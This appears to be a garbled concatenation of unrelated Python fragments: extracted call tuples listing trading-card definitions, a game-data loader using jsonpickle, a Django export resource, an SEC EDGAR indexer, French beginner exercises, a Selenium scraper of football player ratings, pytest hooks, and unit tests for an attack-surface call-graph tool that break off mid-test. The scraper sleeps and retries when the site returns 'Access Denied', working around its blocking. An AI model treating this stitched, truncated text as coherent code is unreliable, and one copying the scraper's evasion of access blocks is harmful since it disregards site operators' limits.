Manager, Card, Game\n'), ((1898, 1939), 'framework.Card', 'Card', (['"""Forbidden Droplet"""', 'CardType.SPELL'], {}), "('Forbidden Droplet', CardType.SPELL)\n", (1902, 1939), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((1953, 1996), 'framework.Card', 'Card', (['"""Called by the Grave"""', 'CardType.SPELL'], {}), "('Called by the Grave', CardType.SPELL)\n", (1957, 1996), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2011, 2049), 'framework.Card', 'Card', (['"""Cosmic Cyclone"""', 'CardType.SPELL'], {}), "('Cosmic Cyclone', CardType.SPELL)\n", (2015, 2049), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2063, 2110), 'framework.Card', 'Card', (['"""Harpie\'s Feather Duster"""', 'CardType.SPELL'], {}), '("Harpie\'s Feather Duster", CardType.SPELL)\n', (2067, 2110), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2130, 2166), 'framework.Card', 'Card', (['"""Mind Control"""', 'CardType.SPELL'], {}), "('Mind Control', CardType.SPELL)\n", (2134, 2166), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2180, 2222), 'framework.Card', 'Card', (['"""Ice Dragon\'s Prison"""', 'CardType.TRAP'], {}), '("Ice Dragon\'s Prison", CardType.TRAP)\n', (2184, 2222), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2238, 2276), 'framework.Card', 'Card', (['"""Solemn Judgment"""', 'CardType.TRAP'], {}), "('Solemn Judgment', CardType.TRAP)\n", (2242, 2276), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2309, 2351), 'framework.Card', 'Card', (['"""Union Carrier"""', 'CardType.EXTRA_DECK'], {}), "('Union Carrier', CardType.EXTRA_DECK)\n", (2313, 2351), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2366, 2415), 'framework.Card', 'Card', (['"""Salamangreat Almiraj"""', 'CardType.EXTRA_DECK'], {}), "('Salamangreat Almiraj', CardType.EXTRA_DECK)\n", (2370, 2415), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2429, 2471), 'framework.Card', 'Card', (['"""Secure Gardna"""', 'CardType.EXTRA_DECK'], {}), "('Secure Gardna', CardType.EXTRA_DECK)\n", (2433, 2471), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2486, 2548), 'framework.Card', 'Card', (['"""Artemis, the Magistus Moon Maiden"""', 'CardType.EXTRA_DECK'], {}), "('Artemis, the Magistus Moon Maiden', CardType.EXTRA_DECK)\n", (2490, 2548), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2563, 2607), 'framework.Card', 'Card', (['"""Invoked Mechaba"""', 'CardType.EXTRA_DECK'], {}), "('Invoked Mechaba', CardType.EXTRA_DECK)\n", (2567, 2607), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2624, 2670), 'framework.Card', 'Card', (['"""Invoked Augoeides"""', 'CardType.EXTRA_DECK'], {}), "('Invoked Augoeides', CardType.EXTRA_DECK)\n", (2628, 2670), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2687, 2733), 'framework.Card', 'Card', (['"""Invoked Purgatrio"""', 'CardType.EXTRA_DECK'], {}), "('Invoked Purgatrio', CardType.EXTRA_DECK)\n", (2691, 2733), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2746, 2794), 'framework.Card', 'Card', (['"""Psy-framelord Omega"""', 'CardType.EXTRA_DECK'], {}), "('Psy-framelord Omega', CardType.EXTRA_DECK)\n", (2750, 2794), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2807, 2861), 'framework.Card', 'Card', (['"""Predaplant Verte Anaconda"""', 'CardType.EXTRA_DECK'], {}), "('Predaplant Verte Anaconda', CardType.EXTRA_DECK)\n", (2811, 2861), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((2876, 2926), 'framework.Card', 'Card', (['"""Red-Eyes Dark Dragoon"""', 'CardType.EXTRA_DECK'], {}), "('Red-Eyes Dark Dragoon', CardType.EXTRA_DECK)\n", (2880, 2926), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((3933, 4422), 'framework.DeckList', 'DeckList', (['((aleister, 3), (invocation, 2), (meltdown, 3), (terraforming, 1), (prison,\n 2), (imperm, 3), (ash, 3), (souls, 3), (dm, 2), (red_eyes, 2), (ref, 3),\n (magicalized_fusion, 1), (candina, 1), (corobane, 1), (lightstage, 1),\n (cyclone, 2), (judgment, 2), (upstart, 1), (duster, 1), (mind_control, \n 1), (set_rotation, 1), (called, 1))', '((almiraj, 1), (artemis, 1), (gardna, 1), (mechaba, 2), (purgatrio, 1), (\n augoeides, 1), (omega, 1), (dragoon, 2), (verte, 2))'], {}), '(((aleister, 3), (invocation, 2), (meltdown, 3), (terraforming, 1),\n (prison, 2), (imperm, 3), (ash, 3), (souls, 3), (dm, 2), (red_eyes, 2),\n (ref, 3), (magicalized_fusion, 1), (candina, 1), (corobane, 1), (\n lightstage, 1), (cyclone, 2), (judgment, 2), (upstart, 1), (duster, 1),\n (mind_control, 1), (set_rotation, 1), (called, 1)), ((almiraj, 1), (\n artemis, 1), (gardna, 1), (mechaba, 2), (purgatrio, 1), (augoeides, 1),\n (omega, 1), (dragoon, 2), (verte, 2)))\n', (3941, 4422), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n')]
|
"""
data.py
Contains and owns the loading and in-memory storage of all of the
pre-defined game data.
:author: <NAME>
:license: MIT, see LICENSE.txt for more details.
"""
import json
import jsonpickle
import gzip
Technologies = {}
Language_Map = {}
def load_language_map(filepath):
f = open(filepath, "r")
Language_Map.update(json.load(f))
f.close()
def load_technologies(filepath):
f = gzip.open(filepath, "rb")
contents = f.read()
f.close()
Technologies.update(jsonpickle.decode(contents, keys=True))
def load_tutorial_game(tutorial_filepath):
f = gzip.open(tutorial_filepath, "rb")
contents = f.read()
f.close()
game = jsonpickle.decode(contents, keys=True)
return game
|
[
"jsonpickle.decode",
"json.load",
"gzip.open"
] |
[((429, 454), 'gzip.open', 'gzip.open', (['filepath', '"""rb"""'], {}), "(filepath, 'rb')\n", (438, 454), False, 'import gzip\n'), ((610, 644), 'gzip.open', 'gzip.open', (['tutorial_filepath', '"""rb"""'], {}), "(tutorial_filepath, 'rb')\n", (619, 644), False, 'import gzip\n'), ((695, 733), 'jsonpickle.decode', 'jsonpickle.decode', (['contents'], {'keys': '(True)'}), '(contents, keys=True)\n', (712, 733), False, 'import jsonpickle\n'), ((358, 370), 'json.load', 'json.load', (['f'], {}), '(f)\n', (367, 370), False, 'import json\n'), ((517, 555), 'jsonpickle.decode', 'jsonpickle.decode', (['contents'], {'keys': '(True)'}), '(contents, keys=True)\n', (534, 555), False, 'import jsonpickle\n')]
|
from django.conf import settings
from import_export import resources, fields
from .models import Match
class MatchResource(resources.ModelResource):
team1 = fields.Field(attribute='team1__name',
column_name='team1')
team2 = fields.Field(attribute='team2__name',
column_name='team2')
winner = fields.Field(attribute='winner__name',
column_name='winner')
game_log = fields.Field()
server_log = fields.Field()
visualizer_url = fields.Field()
class Meta:
model = Match
fields = ('team1', 'team2', 'winner', 'infra_token', 'game_log',
'server_log', 'visualizer_url')
def dehydrate_game_log(self, obj: Match):
return obj.game_log
def dehydrate_server_log(self, obj: Match):
return obj.server_log
def dehydrate_visualizer_url(self, obj: Match):
return f'{settings.VISUALIZER_URL}{obj.game_log}'
|
[
"import_export.fields.Field"
] |
[((165, 223), 'import_export.fields.Field', 'fields.Field', ([], {'attribute': '"""team1__name"""', 'column_name': '"""team1"""'}), "(attribute='team1__name', column_name='team1')\n", (177, 223), False, 'from import_export import resources, fields\n'), ((261, 319), 'import_export.fields.Field', 'fields.Field', ([], {'attribute': '"""team2__name"""', 'column_name': '"""team2"""'}), "(attribute='team2__name', column_name='team2')\n", (273, 319), False, 'from import_export import resources, fields\n'), ((358, 418), 'import_export.fields.Field', 'fields.Field', ([], {'attribute': '"""winner__name"""', 'column_name': '"""winner"""'}), "(attribute='winner__name', column_name='winner')\n", (370, 418), False, 'from import_export import resources, fields\n'), ((460, 474), 'import_export.fields.Field', 'fields.Field', ([], {}), '()\n', (472, 474), False, 'from import_export import resources, fields\n'), ((492, 506), 'import_export.fields.Field', 'fields.Field', ([], {}), '()\n', (504, 506), False, 'from import_export import resources, fields\n'), ((528, 542), 'import_export.fields.Field', 'fields.Field', ([], {}), '()\n', (540, 542), False, 'from import_export import resources, fields\n')]
|
import os
import json
BASE_DIR = r'D:\data\edgar\sampling\Archives\edgar\data'
if __name__ == '__main__':
index = dict()
for cik in os.listdir(BASE_DIR):
for accession in os.listdir(os.path.join(BASE_DIR, cik)):
for fileName in os.listdir(os.path.join(BASE_DIR, cik, accession)):
index[accession] = {
"cik": cik,
"accession": accession,
"fileName": fileName
}
with open('index_by_accession.json', 'w') as index_json:
json.dump(index, index_json)
|
[
"json.dump",
"os.path.join",
"os.listdir"
] |
[((141, 161), 'os.listdir', 'os.listdir', (['BASE_DIR'], {}), '(BASE_DIR)\n', (151, 161), False, 'import os\n'), ((550, 578), 'json.dump', 'json.dump', (['index', 'index_json'], {}), '(index, index_json)\n', (559, 578), False, 'import json\n'), ((199, 226), 'os.path.join', 'os.path.join', (['BASE_DIR', 'cik'], {}), '(BASE_DIR, cik)\n', (211, 226), False, 'import os\n'), ((268, 306), 'os.path.join', 'os.path.join', (['BASE_DIR', 'cik', 'accession'], {}), '(BASE_DIR, cik, accession)\n', (280, 306), False, 'import os\n')]
|
x = 237
a = int(x / 100)
x = x - 100 * a
b = int(x / 10)
x = x - 10 * b
c = x
Resultat = a + b * 10 + c * 100
print(Resultat)
# >>> 732
L = [12, 8, 19, 7, 3, 10]
Resultat = [20 - L[i] for i in range(len(L))]
print(Resultat)
## >>> [8, 12, 1, 13, 17, 10]
Resultat = 0
for i in range(5):
Resultat += i + 1
print(Resultat)
## >>> 15
L = [i for i in range(10)]
for i in range(len(L)):
if i >= 1:
L[i] = L[i] + L[i - 1]
Resultat = L
print(Resultat)
## >>> [0, 1, 3, 6, 10, 15, 21, 28, 36, 45]
Val, i = 0, 0
L = [7, 14, 21, 45, 52, 67, 89, 99]
while Val <= 50:
i += 1
Val = L[i]
Resultat = [i, Val]
print(Resultat)
## >>> [4, 52]
Somme = 0
n = 10
for i in range(n): # il manque les deux points
Somme += i # indentation incorrecte
print(Somme) # il manque la majuscule à Somme
## >>>> 45
from math import pi
Rayon = float(input("Rayon [m] ? > ")) # il manque les ""
Aire = pi * Rayon ** 2 # l' exposant se note ** et pas ^
Perimetre = 2 * pi * Rayon # il manque la majuscule à Rayon
print(f"Aire: {Aire}, Périmètre: {Perimetre}") # f-strings!
# Rayon [m] ? > 45
# >>> Aire: 6361.725123519331, Périmètre: 282.7433388230814
import random
n = 10000
L = [random.randint(0, 1000) for i in range(n)]
a = 0
b = 0
c = 0
for i in range(len(L)):
if L[i] < 500:
a += 1
elif L[i] > 500: # else if ~> elif
b += 1
else:
c += 1
print(a, b, c)
##3 Code non fonctionnel
a = 25
b = 226
a = max(a, b)
b = min(a, b)
r = a
i = 0
while r >= b:
i += 1
r -= b
print(a, " = ", b, " * ", i, "+", r)
##1
a = 25
b = 226
a1 = max(a, b)
b = min(a, b)
r = a1
i = 0
while r >= b:
i += 1
r -= b
print(a1, " = ", b, " * ", i, " + ", r)
# 4 Ecriture de code
# la fonction def decompose(l) qui prend en paramètres une liste l d'entiers et retourne deux listes
def decompose(l):
rp, ri = [], []
for i in range(len(l)):
if l[i] % 2 == 0:
rp.append(l[i])
else:
ri.append(l[i])
return rp, ri
#
##une fonction def present(l,a) qui prend en paramètres une liste d'entiers l et un entier a et ##retourne le nombre de multiples de a dans la liste.
def present(l, a):
c = 0
for i in range(len(l)):
if l[i] % a == 0:
c += 1
return c
|
[
"random.randint"
] |
[((1198, 1221), 'random.randint', 'random.randint', (['(0)', '(1000)'], {}), '(0, 1000)\n', (1212, 1221), False, 'import random\n')]
|
import setuptools
with open("README.md", "r", encoding="UTF-8") as fh:
long_description = fh.read()
setuptools.setup(
name="file-explorer",
version="0.0.0",
author="WangTingZheng",
author_email="<EMAIL>",
description="A simple python cli file browser",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/WangTingZheng/explorer",
packages=setuptools.find_packages(),
install_requires=["pick"],
entry_points={"console_scripts": ["explorer = explorer.command:main"]},
)
|
[
"setuptools.find_packages"
] |
[((436, 462), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (460, 462), False, 'import setuptools\n')]
|
#Given 2 points (x1,y1) and (x2,y2), where x1, x2 are x-coordinates
#and y1, y2 are y-coordinates of the points.
#Your task is to compute the Euclidean distance between them.
#The distance computed should be precise up to 2 decimal places.
from math import sqrt
def compute_distance(x1, y1, x2, y2):
distance = sqrt((x2-x1)**2 + (y2-y1)**2)
return distance
def main():
T = int(input())
d = []
for i in range(0,T):
(x1, y1, x2, y2) = map(int, input().split(" "))
d.append(compute_distance(x1,y1,x2,y2))
for i in range(0,T):
print("Distance: %.2f" %d[i])
if __name__=='__main__':
try: main()
except: pass
|
[
"math.sqrt"
] |
[((318, 355), 'math.sqrt', 'sqrt', (['((x2 - x1) ** 2 + (y2 - y1) ** 2)'], {}), '((x2 - x1) ** 2 + (y2 - y1) ** 2)\n', (322, 355), False, 'from math import sqrt\n')]
|
# ---------------------------------------------------------------------------- #
# World Cup: Stats scanner
# Ver: 0.01
# ---------------------------------------------------------------------------- #
#
# Code by <NAME>
#
# ---------------------------------------------------------------------------- #
import os
import numpy as np
import pandas as pd
import re
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.options import Options
from selenium.common.exceptions import TimeoutException, NoSuchElementException, WebDriverException
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from time import sleep
os.chdir("/mnt/aec0936f-d983-44c1-99f5-0f5b36390285/Dropbox/Python/Predictive Analytics FIFA")
'''
browser = webdriver.Firefox()
browser.get("https://www.whoscored.com/Regions/247/Tournaments/36/Seasons/5967/Stages/15737/Show/International-FIFA-World-Cup-2018")
sleep(3)
base_url = 'https://www.whoscored.com'
def get_countries_links(browser):
return [team.get_attribute('href') for team in browser.find_elements_by_xpath('//table[@id="tournament-fixture"]//td[contains(@class,"team")]//a')]
countries_link = set()
countries_link.update(get_countries_links(browser))
browser.find_elements_by_xpath('//table[@id="tournament-fixture"]//td[contains(@class,"team")]//a')[0].get_attribute('href')
# click next page
browser.find_element_by_xpath('//span[contains(@class, "ui-icon-triangle-1-e")]').click()
sleep(1)
countries_link.update(get_countries_links(browser))
# click next page
browser.find_element_by_xpath('//span[contains(@class, "ui-icon-triangle-1-e")]').click()
sleep(1)
countries_link.update(get_countries_links(browser))
#countries_link
player_link = dict()
for country_link in countries_link:
browser.get(country_link)
sleep(1)
team = browser.find_element_by_xpath('//span[@class="team-header-name"]')
player_link[team.text] = dict()
for player in browser.find_elements_by_xpath('//table[@id="top-player-stats-summary-grid"]//tbody//tr//a'):
player_link[team.text][player.text] = player.get_attribute('href')
np.save("Data/player_link.npy", player_link)
'''
def detect_element(browser, element_id, by_what = By.ID):
# Simplify the detection of an element in the browser
element_present = EC.presence_of_element_located((by_what, element_id))
try:
WebDriverWait(browser, 5, poll_frequency = .1).until(element_present)
return True
except TimeoutException as e:
return False
player_link = np.load("Data/player_link.npy").item()
# will delete nan from already_loaded
already_loaded = rating_dict.copy()
for team in rating_dict.keys():
for player in rating_dict[team]:
if pd.isnull(rating_dict[team][player]):
already_loaded[team].pop(player, None)
#caps = DesiredCapabilities().FIREFOX
caps = DesiredCapabilities.CHROME
caps["pageLoadStrategy"] = "none"
#rating_dict = {team:{} for team in player_link.keys()}
browser = webdriver.Chrome(desired_capabilities = caps)#Firefox(capabilities=caps)
for team in player_link.keys():
for player in player_link[team].keys():
if player in already_loaded[team].keys(): continue
while True:
try:
browser.get(player_link[team][player])
wait = WebDriverWait(browser, 20)
wait.until(EC.presence_of_element_located((By.XPATH, '//table[@id="top-player-stats-summary-grid"]')))
browser.execute_script("window.stop();")
try:
rating_dict[team][player] = browser.find_elements_by_xpath('//table[@id="top-player-stats-summary-grid"]//td[@class="rating"]')[-1].text
print(rating_dict[team][player])
break
except IndexError:
try:
iframe = browser.find_element_by_xpath('//iframe')
browser.switch_to_frame(iframe)
browser.find_element_by_xpath('//p[contains(text(), "Access Denied")]')
sleep(5)
except NoSuchElementException:
rating_dict[team][player] = np.nan
except TimeoutException:
sleep(5)
np.save("Data/rating_dict.npy", rating_dict)
rating_dict['Saudi Arabia']
|
[
"selenium.webdriver.support.ui.WebDriverWait",
"selenium.webdriver.support.expected_conditions.presence_of_element_located",
"numpy.load",
"numpy.save",
"pandas.isnull",
"time.sleep",
"selenium.webdriver.Chrome",
"os.chdir"
] |
[((897, 1001), 'os.chdir', 'os.chdir', (['"""/mnt/aec0936f-d983-44c1-99f5-0f5b36390285/Dropbox/Python/Predictive Analytics FIFA"""'], {}), "(\n '/mnt/aec0936f-d983-44c1-99f5-0f5b36390285/Dropbox/Python/Predictive Analytics FIFA'\n )\n", (905, 1001), False, 'import os\n'), ((3265, 3308), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {'desired_capabilities': 'caps'}), '(desired_capabilities=caps)\n', (3281, 3308), False, 'from selenium import webdriver\n'), ((4577, 4621), 'numpy.save', 'np.save', (['"""Data/rating_dict.npy"""', 'rating_dict'], {}), "('Data/rating_dict.npy', rating_dict)\n", (4584, 4621), True, 'import numpy as np\n'), ((2570, 2623), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'EC.presence_of_element_located', (['(by_what, element_id)'], {}), '((by_what, element_id))\n', (2600, 2623), True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((2807, 2838), 'numpy.load', 'np.load', (['"""Data/player_link.npy"""'], {}), "('Data/player_link.npy')\n", (2814, 2838), True, 'import numpy as np\n'), ((3001, 3037), 'pandas.isnull', 'pd.isnull', (['rating_dict[team][player]'], {}), '(rating_dict[team][player])\n', (3010, 3037), True, 'import pandas as pd\n'), ((2642, 2687), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['browser', '(5)'], {'poll_frequency': '(0.1)'}), '(browser, 5, poll_frequency=0.1)\n', (2655, 2687), False, 'from selenium.webdriver.support.ui import WebDriverWait\n'), ((3594, 3620), 'selenium.webdriver.support.ui.WebDriverWait', 'WebDriverWait', (['browser', '(20)'], {}), '(browser, 20)\n', (3607, 3620), False, 'from selenium.webdriver.support.ui import WebDriverWait\n'), ((3648, 3742), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'EC.presence_of_element_located', (['(By.XPATH, \'//table[@id="top-player-stats-summary-grid"]\')'], {}), '((By.XPATH,\n \'//table[@id="top-player-stats-summary-grid"]\'))\n', (3678, 3742), True, 'from selenium.webdriver.support import expected_conditions as EC\n'), ((4555, 4563), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (4560, 4563), False, 'from time import sleep\n'), ((4382, 4390), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (4387, 4390), False, 'from time import sleep\n')]
|
"""
Configuration module containing pytest-specific hooks.
"""
import os
import logging
from . import helpers
from _pytest.config import Config as PyTestConfig
from dof_discord_bot.src.logger import Log
from dof_discord_bot.src import logger
def _reconfigure_logging():
"""
Helper function used to redirect all logging into the tests-specific log folder.
Accesses the private method of `logger` to avoid repeating the code.
"""
# Clear existing logs
for file_name in os.listdir(helpers.LOG_DIR):
if file_name.endswith(".log"):
os.remove(os.path.join(helpers.LOG_DIR, file_name))
# noinspection PyProtectedMember
logger._configure(log_directory=helpers.LOG_DIR)
Log._logger = logging.getLogger("dof-discord-bot")
Log.info("Logging has been reconfigured")
def pytest_configure(config: PyTestConfig):
"""
Configuration hook which reconfigures the logging and calls the global setup function.
"""
_reconfigure_logging()
helpers.setup()
Log.info("Pytest configuration hook finished successfully")
def pytest_unconfigure(config: PyTestConfig):
"""
Configuration hook which calls the global teardown function.
"""
helpers.teardown()
Log.info("Pytest unconfiguration hook finished successfully")
# An explicit "kill" of current process to ensure clean exit in case of errors when stopping the code
os._exit(0)
|
[
"dof_discord_bot.src.logger.Log.info",
"dof_discord_bot.src.logger._configure",
"os._exit",
"os.path.join",
"os.listdir",
"logging.getLogger"
] |
[((494, 521), 'os.listdir', 'os.listdir', (['helpers.LOG_DIR'], {}), '(helpers.LOG_DIR)\n', (504, 521), False, 'import os\n'), ((668, 716), 'dof_discord_bot.src.logger._configure', 'logger._configure', ([], {'log_directory': 'helpers.LOG_DIR'}), '(log_directory=helpers.LOG_DIR)\n', (685, 716), False, 'from dof_discord_bot.src import logger\n'), ((735, 771), 'logging.getLogger', 'logging.getLogger', (['"""dof-discord-bot"""'], {}), "('dof-discord-bot')\n", (752, 771), False, 'import logging\n'), ((776, 817), 'dof_discord_bot.src.logger.Log.info', 'Log.info', (['"""Logging has been reconfigured"""'], {}), "('Logging has been reconfigured')\n", (784, 817), False, 'from dof_discord_bot.src.logger import Log\n'), ((1022, 1081), 'dof_discord_bot.src.logger.Log.info', 'Log.info', (['"""Pytest configuration hook finished successfully"""'], {}), "('Pytest configuration hook finished successfully')\n", (1030, 1081), False, 'from dof_discord_bot.src.logger import Log\n'), ((1238, 1299), 'dof_discord_bot.src.logger.Log.info', 'Log.info', (['"""Pytest unconfiguration hook finished successfully"""'], {}), "('Pytest unconfiguration hook finished successfully')\n", (1246, 1299), False, 'from dof_discord_bot.src.logger import Log\n'), ((1411, 1422), 'os._exit', 'os._exit', (['(0)'], {}), '(0)\n', (1419, 1422), False, 'import os\n'), ((584, 624), 'os.path.join', 'os.path.join', (['helpers.LOG_DIR', 'file_name'], {}), '(helpers.LOG_DIR, file_name)\n', (596, 624), False, 'import os\n')]
|
import copy
import os
import unittest
import networkx as nx
from attacksurfacemeter import utilities
from attacksurfacemeter.call import Call
from attacksurfacemeter.call_graph import CallGraph
from attacksurfacemeter.environments import Environments
from attacksurfacemeter.loaders.cflow_loader import CflowLoader
from attacksurfacemeter.loaders.gprof_loader import GprofLoader
class UtilitiesTestCase(unittest.TestCase):
def test_fix(self):
# Arrange
target = CallGraph.from_loader(
CflowLoader(
os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'helloworld/cflow.callgraph.r.mod.txt'
),
True
)
)
_target = copy.deepcopy(target)
reference = CallGraph.from_loader(
GprofLoader(
os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'helloworld/gprof.callgraph.txt'
)
)
)
expected = {
'before': Call('GreeterSayHi', '', Environments.C),
'after': Call('GreeterSayHi', './src/helloworld.c', Environments.C)
}
# Act
utilities.fix(target, using=reference)
actual = {
'before': next(
i
for (i, _) in _target.nodes
if i.function_name == 'GreeterSayHi'
),
'after': next(
i
for (i, _) in target.nodes
if i.function_name == 'GreeterSayHi'
)
}
# Assert
self.assertEqual(expected['before'], actual['before'])
self.assertEqual(expected['after'], actual['after'])
# Asserting if node attributes got carried over
self.assertCountEqual(
[
attrs
for (i, attrs) in _target.nodes
if i == expected['before']
],
[
attrs
for (i, attrs) in target.nodes
if i == expected['after']
]
)
# Asserting if edge attributes got carried over
self.assertCountEqual(
[
attrs
for (i, j, attrs) in _target.edges
if i == expected['before'] or j == expected['before']
],
[
attrs
for (i, j, attrs) in target.edges
if i == expected['after'] or j == expected['after']
],
)
# Asserting if OTHER nodes and their attributes got carried over
self.assertCountEqual(
[
(i, attrs)
for (i, attrs) in _target.nodes
if i != expected['before']
],
[
(i, attrs)
for (i, attrs) in target.nodes
if i != expected['after']
]
)
# Asserting if OTHER edges and their attributes got carried over
self.assertCountEqual(
[
(i, j, attrs)
for (i, j, attrs) in _target.edges
if i != expected['before'] and j != expected['before']
],
[
(i, j, attrs)
for (i, j, attrs) in target.edges
if i != expected['after'] and j != expected['after']
],
)
def test_get_fragments(self):
# Arrange
# a -- b e -- f -- g
# | |
# | |
# d -- c h -- i j
graph = nx.DiGraph()
graph.add_nodes_from(
['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j']
)
graph.add_edges_from([
('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'),
('d', 'c'), ('d', 'a'), ('a', 'd'), ('e', 'f'), ('f', 'e'),
('f', 'g'), ('g', 'f'), ('h', 'i'), ('i', 'h')
])
expected = [None] * 4
expected[0] = nx.DiGraph()
expected[0].add_nodes_from(['a', 'b', 'c', 'd'])
expected[0].add_edges_from([
('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'),
('d', 'c'), ('d', 'a'), ('a', 'd')
])
expected[1] = nx.DiGraph()
expected[1].add_nodes_from(['e', 'f', 'g'])
expected[1].add_edges_from(
[('e', 'f'), ('f', 'e'), ('f', 'g'), ('g', 'f')]
)
expected[2] = nx.DiGraph()
expected[2].add_nodes_from(['h', 'i'])
expected[2].add_edges_from([('i', 'h'), ('h', 'i')])
expected[3] = nx.DiGraph()
expected[3].add_nodes_from(['j'])
# Act
actual = utilities.get_fragments(graph)
actual.sort(key=lambda i: len(i.nodes()), reverse=True)
# Assert
self.assertEqual(len(expected), len(actual))
for i in range(4):
self.assertCountEqual(expected[i].nodes(), actual[i].nodes())
self.assertCountEqual(expected[i].edges(), actual[i].edges())
def test_get_fragments_for_undirected(self):
# Arrange
# a -- b e -- f -- g
# | |
# | |
# d -- c h -- i j
graph = nx.Graph()
graph.add_nodes_from(
['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j']
)
graph.add_edges_from([
('a', 'b'), ('b', 'c'), ('c', 'd'), ('d', 'a'), ('e', 'f'),
('f', 'g'), ('h', 'i')
])
# Assert
self.assertRaises(Exception, utilities.get_fragments, graph)
def test_get_largest_fragment(self):
# Arrange
# a -- b e -- f -- g
# | |
# | |
# d -- c h -- i j
graph = nx.DiGraph()
graph.add_nodes_from(
['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j']
)
graph.add_edges_from([
('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'),
('d', 'c'), ('d', 'a'), ('a', 'd'), ('e', 'f'), ('f', 'e'),
('f', 'g'), ('g', 'f'), ('h', 'i'), ('i', 'h')
])
expected = nx.DiGraph()
expected.add_nodes_from(['a', 'b', 'c', 'd'])
expected.add_edges_from([
('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'),
('d', 'c'), ('d', 'a'), ('a', 'd')
])
# Act
actual = utilities.get_largest_fragment(utilities.get_fragments(graph))
# Assert
self.assertCountEqual(expected.nodes(), actual.nodes())
self.assertCountEqual(expected.edges(), actual.edges())
def test_get_node_attrs(self):
# Scenario: main -- printf (cflow)
# Arrange
source = 'cflow'
caller = Call('main', 'main.c', Environments.C)
callee = Call('printf', '', Environments.C)
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, list(), list()
)
# Assert
# Caller Attributes
self.assertTrue('tested' not in caller_attrs)
self.assertTrue('defense' not in caller_attrs)
self.assertTrue('vulnerable' not in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNone(callee_attrs)
# Scenario: main -- printf (gprof)
# Arrange
source = 'gprof'
caller = Call('main', 'main.c', Environments.C)
callee = Call('printf', '', Environments.C)
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, list(), list()
)
# Assert
# Caller Attributes
self.assertTrue('tested' in caller_attrs)
self.assertTrue('defense' not in caller_attrs)
self.assertTrue('vulnerable' not in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNone(callee_attrs)
# Scenario: main -- None (gprof)
# Arrange
source = 'gprof'
caller = Call('main', 'main.c', Environments.C)
callee = None
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, list(), list()
)
# Assert
# Caller Attributes
self.assertTrue('tested' not in caller_attrs)
self.assertTrue('defense' not in caller_attrs)
self.assertTrue('vulnerable' not in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNone(callee_attrs)
# Scenario: main -- validate* (cflow)
# * Designed defense
# Arrange
source = 'cflow'
defenses = [Call('validate', 'utils.c', Environments.C)]
caller = Call('main', 'main.c', Environments.C)
callee = Call('validate', 'utils.c', Environments.C)
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, defenses, list()
)
# Assert
# Caller Attributes
self.assertTrue('tested' not in caller_attrs)
self.assertTrue('defense' not in caller_attrs)
self.assertTrue('vulnerable' not in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
